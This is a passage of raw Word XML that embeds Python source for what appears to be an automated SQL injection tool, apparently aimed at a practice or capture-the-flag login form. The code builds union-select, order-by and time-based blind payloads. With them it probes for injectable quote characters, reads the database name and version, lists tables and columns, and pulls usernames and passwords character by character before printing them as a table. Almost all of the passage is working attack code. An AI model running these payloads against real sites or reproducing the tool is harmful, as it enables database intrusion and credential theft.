      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>})=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{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},1,sleep(0.001))#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3813F95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'passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715143B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559EA2E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data_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DC94B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res_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>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46431D8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17D0C27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3EC079A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length = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="790837F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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B57C3F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_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0105AE4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 xml:space="preserve"> = [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32, 127)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FBA19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length + 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D725EB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for j in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A78CE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data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D4991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 xml:space="preserve">': symbol + " or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ascii(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>((select password "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7402AD4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    "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> users "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BF2C8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     "limit " + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 1) + ",1),{0},1))={1},1,sleep(0.001))#".format(i, j),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321D057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'passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E66D9A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        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB8C37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res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4D2EB5D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1402F9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512E9CD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0444467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_ += chr(j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5012F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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pwds.append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_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF3FEA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_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377DD2C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\n%-12s%-12s' % ('username', 'password'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710B91B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us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wd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zip(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">users, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pwds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E275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%-12s%-12s' % (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BBA23C" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="164B8A4D" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B056FC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do_time_injection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4A9E4B4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, symbol = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>can_inject_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35BA09B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his_database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exe_func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'database()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D13195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version = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exe_func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'version()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C07F2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Success -&gt; ' + 'MySQL' + ' ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>version.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DB569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Database -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>this_database.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60947FC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get_tables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3BF7726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get_columns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1EECA3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ables = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_tables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773E985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Tables -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tables.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3766811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Default Use Table users......')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7273409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lumns = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_columns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4A810C7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Columns -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C8DD2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Try to get Data........')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD9989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get_values_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tim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45BF5D6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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596FFB82" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38108D0F" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F"/>
    <w:p w14:paraId="6E004253" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F"/>
    <w:p w14:paraId="1AFD6E1B" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F"/>
    <w:p w14:paraId="0775B058" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:t>Posts/union_bsd_plus_err.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FACBB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from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sqlis.modules.posts.err_util</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58667B68" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E9920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# from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sqlis.modules</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.posts.bool_util</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>do_bool_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="038627F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# from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sqlis.modules</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.posts.time_util</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>do_time_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CB725D6" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2933620D" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334568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>def log(content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C170E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time.strftime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">('%H:%H:%S', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time.localtime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ime.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001451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[' + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>this_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) + ']' + content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26804148" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21552B1F" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B63FBB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_):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BC387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# </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r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40CF857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_ = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>urlencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(data_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7440550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_ = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630B318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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request.urlopen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=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=data_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F78F50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str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>res.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>().decode('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C91E4" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60559FD5" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE19D9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can_injec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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D66D92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 xml:space="preserve"> = ["'", '")', "')", '"']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA5BBA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item in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>test_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1DEE7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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5952D09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"admin" + str(item) + " union select 1=1,2#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5918AD2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passwd': "admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B8C1B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ED251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test_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B4840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0039BB8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41DB688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"flag" in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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1946F2D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Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E00A5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return True, item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFA51D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1022D7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Use ' + item + ' -&gt; Not Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A9E31D" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="477A8FF9" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43F2256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test_order_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>by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3B9130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lag = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF755B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50):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA103F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Order By Test -&gt; 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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E22A9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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D11E4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'admin' + symbol + ' order by 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#',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B82B55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'passwd': "admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2073FC5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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA4436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64BA062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4F89FFA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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2241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 = str(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>fonts[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493B7BC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1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0A092CA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"Login" not in fonts1[0]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D020F6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fonts1[0] is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7316BAD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return "blind"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0B8A3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"No desired render......")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C19F2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return '0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0409E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"slap" in content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FC3E6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Order By Test Success -&gt; order by ' +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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F3CA3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flag = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DA0978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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E2458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flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77920EF3" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39548859" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AFF92C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test_union_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>selec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flag):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AEAAF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7CE1BB7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'-admin' + symbol + ' union select ',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE0C5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"admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C097FF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337FB4B3" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4543FBD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5C202AA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flag - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591175E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#'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE4F6F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23E2FF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566729D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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBC228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228542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6D4A72D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5C24EF7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 = str(fonts[3].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10043D3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0DAE3B2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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>content.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(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 != -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702039E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 xml:space="preserve"> =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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F59707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return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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>temp_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="453C454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xcept Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B33B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print(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3B319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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEB6134" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23FCC376" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32E348D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exec_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>functio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, function):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546EBBD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372A2A5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"-admin" + symbol + " union select ",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A6F4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0AF6ACE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3454C51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331A81D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index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF2DCB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function + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7209E4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flag - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009FEB0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#'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1209504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0A59859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2767CAD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53DE54E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136C884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45B530A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ntent = str(fonts[3].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5317A81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0])[1].split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1])[0]  #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D977F9F" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4807E2BC" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719216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bas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:</w:t>
      </w:r>
    </w:p>
